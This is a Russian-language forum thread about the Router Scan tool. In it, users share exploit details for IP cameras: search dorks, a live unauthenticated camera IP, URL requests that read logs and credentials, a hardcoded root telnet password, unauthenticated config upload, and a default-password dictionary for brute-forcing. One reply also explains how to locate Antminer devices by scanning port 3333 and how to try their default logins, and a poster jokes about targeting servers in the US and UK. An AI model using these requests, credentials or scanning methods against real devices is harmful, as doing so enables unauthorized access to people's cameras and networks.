прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    "Пользуясь случаем, хочу." (c)
    Хочу поделится для всех интересующихся, портабельной версией Charles 4.0, описание в архиве:
    https://yadi.sk/d/oCqBP7os3Rbdch
     
    Pebenok70, hydra, Triton_Mgn and 6 others like this.
  2. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    вы меня сподвигаете на подвиги во имя роутерскана :)

    тут натолкнулся недавно на одну железку - ADH-Web Server IP-Cameras. это не просто обычная айпи-камера. целый и довольно интересный сервер (пояснения для принципиальных анти-вуайеристов) :p:D:D:D

    ради интереса нашел экслойтик, но нет возможности сейчас его докрутить до удобоваримого для роутерскана состояния. может кто поиграется поплотнее?
    директория / hdd0 /logs
    позволяет удаленно просматривать произвольные файлы и получить многочисленную информацию через параметр «variable» в скрипте variable.cgi.

    шодан дорк :

    ADH-Web

    /gui/gui_outer_frame.shtml

    гугл дорк :
    /gui/gui_outer_frame.shtml
    можно просто, без поисковых запросов.

    этот без авторизации пускает в настройки. для изучения файловой структуры
    85.189.234.21:8080

    пример запроса:
    http://ip/hdd0/logs/log.txt

    наиболее интересные файлы
    bak.txt
    connect.txt
    log.txt
    seclog.log
    startup.txt
    DBGLOG.TXT
    access.txt
    security.txt

    проверенные апишники не даю. подвесят страждующие. только в личку (при необходимости) и только binarymaster-у. каждый может сам найти. в гугле их валом. правда не на всех прошивках срабатывает.

    полное описание эксплойта ( там есть еще реализации)
    ADH-Web Server IP-Cameras Improper Access Restrictions

    Vulnerability Details

    Usually this directory can be protected against
    unauthenticated access (401 Unauthorized), though, it can access all files
    directly without requiring authentication.As in the statement below:

    [401]
    . 'http://<target_ip>/hdd0/logs'
    [200]
    . 'http://<target_ip>/hdd0/logs/log.txt'

    Most common logfiles:

    . 'bak.txt
    . 'connect.txt'
    . 'log.txt'
    . 'seclog.log'
    . 'startup.txt'
    . 'DBGLOG.TXT'
    . 'access.txt'
    . 'security.txt'

    Impact

    This could allow a remote attacker to obtain valuable information such as
    access credentials, Network configuration and other sensitive information
    in plain text.

    Another problem identified is an information exposure via the parameter
    "variable" in variable.cgi script. Knowing some variables can extract a
    reasonable amount of information. For exemplo:

    * DNS
    . 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0'

    * ftp master ftp console credenthials ((the development team said that this
    credential is not used, then why does it exist?):
    . '
    http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
    '
    . '
    http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
    '

    (although the vast majority of servers have ftp / telnet with anonymous
    access allowed.)

    * alarms
    . 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0'
    * camconfig
    . 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1'
    (includes, but is not limited to) There are a lot of variables [an audit
    tool is on the way].

    This servers also sends credentials (and other sensitive data) via GET
    parameters
    This is poor practice as the URL is liable to be logged in any number of
    places
    between the customer and the camera. The credentials should be passed in
    the body
    of a POST request (under SSL of course, here is not the case). .
    (Is possible to create, edit and delete users and other configurations in
    this way, dangerous)

    4. *Vulnerable Products and Packages*

    . The following products are affected:
    - SD Advanced Closed IPTV
    - SD Advanced
    - EcoSense
    - Digital Sprite 2

    сорри если баян. память последнее время что-то подводить стала :) в случае чего - удалю пост, дабы не засорять форум.

    п.с. осторожнее с экспериментами. основная часть найденных мной серверов находится в штатах и грейтбритан :). а то опять крику будет, по поводу атак русских хакеров :). никто ведь не поймет, что это всего лишь дух творчества и здоровой любознательности :)
     
    #5602 sha9, 20 Jan 2018
    Last edited: 20 Jan 2018
  3. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    еще один свежий эксплойт на Master IP CAM. дорк не получилось найти. если кто сталкивался-поделитесь для экспериментов.
    I DESCRIPTION
    ========================================================================
    The Master IP CAM 01 suffers of multiple vulnerabilities:

    # [CVE-2018-5723] Hardcoded Password for Root Account
    # [CVE-2018-5724] Unauthenticated Configuration Download and Upload
    # [CVE-2018-5725] Unauthenticated Configuration Change
    # [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure


    II PROOF OF CONCEPT
    ========================================================================

    ## [CVE-2018-5723] Hardcoded Password for Root Account

    Is possible to access telnet with the hardcoded credential root:cat1029


    ## [CVE-2018-5724] Unauthenticated Configuration Download and Upload

    Download:

    http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi

    Upload Form:

    ### Unauthenticated Configuration Upload
    <form name="form6" method="post" enctype="multipart/form-data"
    action="cgi-bin/hi3510/restore.cgi" >
    <input type="file" name="setting_file" >
    <input type="submit" value="restore" >
    </form>


    ## [CVE-2018-5725] Unauthenticated Configuration Change

    Change configuration:

    http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080

    List of available commands here:
    http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf


    ## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure

    Retrieve sensitive information:

    http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser

    на мой взгляд этот CVE-2018-5726 наиболее интересен, в том числе и для роутерскана.
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Этот уже добавлен.
    Опечатка.
     
    sha9 likes this.
  5. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    исправил

    жаль, что опоздал. а я как-раз шодан-дорк нашел :(:confused::D RT_IPC

    пост с эксплойтом не удаляю. может кому интересно будет самому поиграться...

    п.с. интересная статья на этот счет
    http://syrion.me/blog/master-ipcam/
     
    #5605 sha9, 20 Jan 2018
    Last edited: 20 Jan 2018
    Triton_Mgn and Ossen like this.
  6. Deus

    Deus Member

    Joined:
    18 Jun 2015
    Messages:
    24
    Likes Received:
    5
    Reputations:
    0
    Можно ли от сканировать майнеры Bitmain Antminer, попадалось кому то?
     
  7. Deus

    Deus Member

    Joined:
    18 Jun 2015
    Messages:
    24
    Likes Received:
    5
    Reputations:
    0
    Я задал вопрос, а не делему дураков, форум для того и форум, википедию вам в помощь, Люди воспитанные на сказках про Иванушку-дурачка и Соловья-разбойника не могут быть иными как генетическими склонными к преступлениям и недоразвитыми мозгами,которых следует изолировать от нормального сообщества в целях локализации чумы...
     
  8. Deus

    Deus Member

    Joined:
    18 Jun 2015
    Messages:
    24
    Likes Received:
    5
    Reputations:
    0
    Я повторюсь, можно ли от сканировать или же нет, а если это уже где то выше описано то ткните. вот и все. Спасибо ( а на сказки перешли вы (буратино) как и на личности)
     
  9. Deus

    Deus Member

    Joined:
    18 Jun 2015
    Messages:
    24
    Likes Received:
    5
    Reputations:
    0
    ответить можно было одним постом, чем вы не сПамперс? Ликуете :D:p
     
  10. Artha

    Artha Member

    Joined:
    2 Sep 2013
    Messages:
    73
    Likes Received:
    52
    Reputations:
    6
  11. _Danil_

    _Danil_ Member

    Joined:
    1 Jun 2015
    Messages:
    22
    Likes Received:
    29
    Reputations:
    2
    Может кому-то нужно, сделал огромный список паролей для RouterScan, думаю, он содержит почти все дефолтные и часто используемые пароли в сетевых устройствах (роутерах, камерах т.д.), повторов в списке нет, и везде по прописывал <empty>, для пустых полей, чтобы RS понимал. Только если будете использовать такие больше словари, вы таймаут в RS побольше ставьте :)


    http://zalil.su/4871484
     
    4Fun, Pebenok70, VVinslow and 7 others like this.
  12. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    А вот это в правду не видал, высшая сатира специалистов над попсой. Супер. Спасибо! :)
    Ржал как в детстве.
     
    TEXAC, sha9 and Triton_Mgn like this.
  13. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,659
    Likes Received:
    5,793
    Reputations:
    51

    Специально для темы RS)
     
    #5613 Triton_Mgn, 21 Jan 2018
    Last edited: 21 Jan 2018
  14. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    не в тему будь сказано, как раз наоборот. люди воспитанные на сказках про соловья разбойника и иванушку дурачка склонны к творческому мышлению. а вот люди воспитанные на покемонах, халках, бетменах и манге точно "склонны к преступлениям и недоразвитым мозгам". никого лично не имел ввиду. просто уточнение истины ради... :)
     
    #5614 sha9, 21 Jan 2018
    Last edited: 21 Jan 2018
    Andrey9999, Ossen, Triton_Mgn and 2 others like this.
  15. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    не стоит заморачиваться. на этой ветке форума ранее уже обсуждался вопрос больших словарей по дефолту. пройдитесь по форуму. бесполезное занятие. таймаут не поможет. и в частности, большинство роутеров просто залочится (как одна из причин). для отсутствующих в списке паролей рекомендуется использовать функцию юс крединтиалс. хотя в принципе творческий подход к делу всегда заслуживает уважения...
     
    #5615 sha9, 21 Jan 2018
    Last edited: 21 Jan 2018
  16. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    здесь вам не ответят на этот вопрос. не потому, что не знают, а потому как :
    1. на этой ветке форума в основном собрались экспериментаторы, а не взломщики. взломами и мелкими пакостями с помощью роутерскана занимаются по большей части скрипткиди, которые "не забывают все галочки выставлять" в роутерскане :) большинство участников данной ветки такие вещи, как взломы и угоны не одобряют. достаточно просто прочитать посты старожилов, чтобы убедиться в этом.
    2.данная ветка форума, одна из самых обсуждаемых на форуме, т.к.роутерскан - один из самых топовых инструментов в нете. и в связи с этим привлекает к себе повышенное внимание не только любознательных участников, но и серьезных дядей в погонах. потому, это не та площадка для такого обсуждения. с такими вопросами вам действительно лучше в даркнете побродить. там обсуждаются взломы банкоматов, банковских серверов, угоны пайпала и майнеров.
    3.роутерскан в этом деле не помощник. тут требуются другие инструменты и другой подход. роутерскан - это мощный интеллигентный тестер, но с другими задачами. и никто его не будет подгонять под нужды каждого желающего что-либо взломать или угнать.

    теперь по теме.
    антминер работает через стандартный роутер. его подключают как клиента. потому его нужно искать ИМХО только через роутер.
    уверен, что вы в курсе этого, но на всякий случай
    https://mining-help.ru/articles/83-nastroika-antminer-s9-i-podklyuchenie.html

    попробуйте просканировать диапазон портов 3333. пройдитесь по диапазону, к примеру змапом, потом подключайте другие инструменты по найденным айпишникам.и в случае удачи - найдете.
    если определили - изучите конфиги. стандартный логин-пасс можно взять к примеру в том числе и отсюда
    https://github.com/bitmaintech/Antm...ghttpd-1.0/www/cgi-bin/minerConfiguration.cgi

    основной файл minerConfiguration.cgi (к слову по тому-же запросу можете поискать и на шодане).
    в том-же файле можно поискать и баги ( если дружите с кодингом). во всяком случае эксплойты тоже есть на антминер. наталкивался как-то несколько раз. лень искать. сами сможете найти. но в любом случае для роутерскана ( даже если бы и стоял так вопрос) они не пригодны. там нужно ручками ковырять.

    но в целом-полностью согласен с Ossen
    хотя в некотором смысле этот вопрос пересекается с роутерами. так-что это не совсем флуд. тем более, что изначально человеком ставился вопрос о включении антминера в роутерскан ;):)

    в соответствии с вашим предложением
    так и сделал. надеюсь, что мой ответ (в меру моих, наиболее чем скромных, познаний) вас удовлетворит.:)
     
    #5616 sha9, 21 Jan 2018
    Last edited: 21 Jan 2018
    Pebenok70, to.Index, Ossen and 3 others like this.
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    https://miloserdov.org/?p=712

    Новая статья про Router Scan v2.60 вышла, хорошо раскрывает потенциал новых фич, понравилась. :)
     
  18. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    тут та же статья
    только на русском. алексей дублирует свои статьи на английском для западных читателей. оно и правильно...:).нужно развиваться в ширь, не только в высоту :)
     
    #5618 sha9, 21 Jan 2018
    Last edited: 21 Jan 2018
    TEXAC, hunt.lsk, Triton_Mgn and 4 others like this.
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    На экспорт. :rolleyes:
     
    Triton_Mgn, Kakoluk and sha9 like this.
  20. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    [​IMG]

    @sha9 aka Dik Lee зачем пользователей в заблуждение вводишь? o_O

    Сам то не разобрался... отправляйся читать документацию...

    (по посту - ответил на том форуме)